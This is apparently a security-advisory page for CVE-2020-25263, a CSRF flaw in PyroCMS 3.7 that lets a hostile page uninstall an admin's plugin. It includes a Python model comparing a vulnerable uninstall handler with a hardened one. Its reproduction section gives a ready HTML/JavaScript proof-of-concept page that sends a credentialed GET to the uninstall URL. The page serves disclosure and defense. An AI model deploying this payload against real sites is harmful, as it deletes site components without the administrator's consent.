VYPR
High severity · NVD Advisory · Published Oct 8, 2020 · Updated Aug 4, 2024

CVE-2020-25263

Description

PyroCMS 3.7 is vulnerable to cross-site request forgery (CSRF) via the admin/addons/uninstall/anomaly.module.blocks URI: an arbitrary plugin will be deleted.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Affected packages

Versions sourced from the GitHub Security Advisory.

| Package | Affected versions | Patched versions |
|---|---|---|
| pyrocms/pyrocms (Packagist) | <= 3.7 | (none listed) |

Vulnerability mechanics

Root cause

"Missing CSRF token validation on the plugin uninstall action, which is performed via a GET request."

Attack vector

An attacker hosts a malicious HTML page that sends a GET request to `/admin/addons/uninstall/anomaly.module.blocks` [ref_id=1]. Because PyroCMS does not verify whether the request was intentionally made by the authenticated user (CSRF), the browser automatically includes the victim's session cookies when the request is sent [CWE-352]. The attacker lures an already-authenticated PyroCMS admin to visit the malicious page via social engineering, and the plugin is deleted on the victim's behalf [ref_id=1].

Affected code

The advisory [ref_id=1] identifies the vulnerable URI as `/admin/addons/uninstall/anomaly.module.blocks`. The exact source file is not named in the bundle, but the vulnerability lies in the controller handling the uninstall action for addons/modules, which accepts a GET request without CSRF token validation.

What the fix does

No patch is included in the bundle. The advisory [ref_id=1] identifies that the root cause is the use of a GET request for a state-changing action (plugin uninstall) without CSRF protection. The remediation would require the application to either (a) require a CSRF token for the uninstall action, (b) change the HTTP method from GET to POST/DELETE, or (c) implement a confirmation step. The advisory does not specify whether a fix was ever released.
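The remediation options named above, a CSRF token on the uninstall action and a state-changing HTTP method instead of GET, as an added example that is not PyroCMS's or the advisory's code: a small Python model of the uninstall route with the flawed handler beside a hardened one. The `Request` type, the in-memory session store and the handler names are constructed for the demo; PyroCMS itself is a Laravel (PHP) application, so this models the check, not its actual controller.

```python
# Added example, not PyroCMS code: the admin uninstall action modelled twice,
# once with the flaw (authenticated GET deletes the addon) and once with the
# advisory's remediations (a) per-session synchronizer token and (b) POST only.
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional, Set, Tuple

UNINSTALL_PREFIX = "/admin/addons/uninstall/"

# Constructed in-memory session store: session id -> session data.
SESSIONS: Dict[str, dict] = {}


@dataclass
class Request:
    """Constructed stand-in for an HTTP request as the server sees it."""
    method: str
    path: str
    cookies: dict = field(default_factory=dict)  # attached by the browser, even cross-site
    form: dict = field(default_factory=dict)     # body fields; a cross-site form can set
                                                 # them but cannot read the victim's token


def login_admin() -> str:
    """Create an authenticated admin session with a fresh CSRF token."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": "admin", "csrf_token": secrets.token_urlsafe(32)}
    return sid


def _session_for(req: Request) -> Optional[dict]:
    return SESSIONS.get(req.cookies.get("session", ""))


def _addon_from_path(path: str) -> Optional[str]:
    if not path.startswith(UNINSTALL_PREFIX):
        return None
    return path[len(UNINSTALL_PREFIX):] or None


def uninstall_vulnerable(req: Request, installed: Set[str]) -> Tuple[int, str]:
    """Flawed behaviour: any authenticated request, GET included, uninstalls.
    Because the browser sends the session cookie with a cross-site GET, a page
    the admin merely visits is enough to reach this code path."""
    if _session_for(req) is None:
        return 403, "not authenticated"
    addon = _addon_from_path(req.path)
    if addon is None:
        return 404, "not found"
    installed.discard(addon)
    return 200, "uninstalled " + addon


def uninstall_hardened(req: Request, installed: Set[str]) -> Tuple[int, str]:
    """(b) only POST may change state; (a) the body must carry the token that
    only a page served by this application could have embedded."""
    session = _session_for(req)
    if session is None:
        return 403, "not authenticated"
    if req.method != "POST":
        # GET/HEAD stay side-effect free, so <img>, <script> and XHR GETs from
        # another origin can no longer trigger the uninstall.
        return 405, "state-changing action requires POST"
    # Constant-time comparison so the token cannot be recovered via timing.
    if not hmac.compare_digest(req.form.get("_token", ""), session["csrf_token"]):
        return 403, "CSRF token mismatch"
    addon = _addon_from_path(req.path)
    if addon is None:
        return 404, "not found"
    installed.discard(addon)
    return 200, "uninstalled " + addon


def run_scenarios() -> Dict[str, Tuple[int, bool]]:
    """Replay the cross-site GET from the advisory and a forged POST against
    both handlers, then a legitimate token-bearing POST. Each result is
    (status, addon still installed?)."""
    sid = login_admin()
    path = UNINSTALL_PREFIX + "anomaly.module.blocks"
    cookie = {"session": sid}
    results = {}

    # Cross-site GET as the PoC page sends it: cookie present, no token.
    installed = {"anomaly.module.blocks", "anomaly.module.pages"}
    status, _ = uninstall_vulnerable(Request("GET", path, cookies=cookie), installed)
    results["vulnerable_get"] = (status, "anomaly.module.blocks" in installed)

    installed = {"anomaly.module.blocks", "anomaly.module.pages"}
    status, _ = uninstall_hardened(Request("GET", path, cookies=cookie), installed)
    results["hardened_get"] = (status, "anomaly.module.blocks" in installed)

    # Forged POST: the cookie still rides along, but the attacker's page cannot
    # read the victim's token, so the submitted value is wrong.
    forged = Request("POST", path, cookies=cookie, form={"_token": "guess"})
    status, _ = uninstall_hardened(forged, installed)
    results["hardened_forged_post"] = (status, "anomaly.module.blocks" in installed)

    # Legitimate admin action: the application's own form embeds the token.
    legit = Request("POST", path, cookies=cookie, form={"_token": SESSIONS[sid]["csrf_token"]})
    status, _ = uninstall_hardened(legit, installed)
    results["hardened_legit_post"] = (status, "anomaly.module.blocks" in installed)
    return results


if __name__ == "__main__":
    for name, (status, still_installed) in run_scenarios().items():
        print(f"{name:22} status={status} addon still installed={still_installed}")
```

Changing the verb and adding the token are complementary rather than alternatives: framework CSRF middlewares, Laravel's included, skip token validation for GET and HEAD on the assumption that reads have no side effects, so a state change reachable by GET bypasses them no matter how the token is configured. Moving the action to POST is what brings it under the token check in the first place.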

Preconditions

  • auth: Victim must be authenticated to the PyroCMS admin panel
  • input: Attacker must trick the victim into visiting a malicious page (social engineering)
  • config: The target PyroCMS instance must be version 3.7

Reproduction

Create a page with the following content and host it on an attacker-controlled server. When an authenticated PyroCMS admin visits the page, the `anomaly.module.blocks` plugin will be deleted without their consent [ref_id=1].

```html
<!DOCTYPE html>
<html>
<head>
<title></title>
<script type="text/javascript">
var url = "http://test.com/admin/addons/uninstall/anomaly.module.blocks";
var xhr = new XMLHttpRequest();
xhr.open("GET", url);
xhr.withCredentials = true;
xhr.send(null);
</script>
</head>
</html>
```

Generated on May 27, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
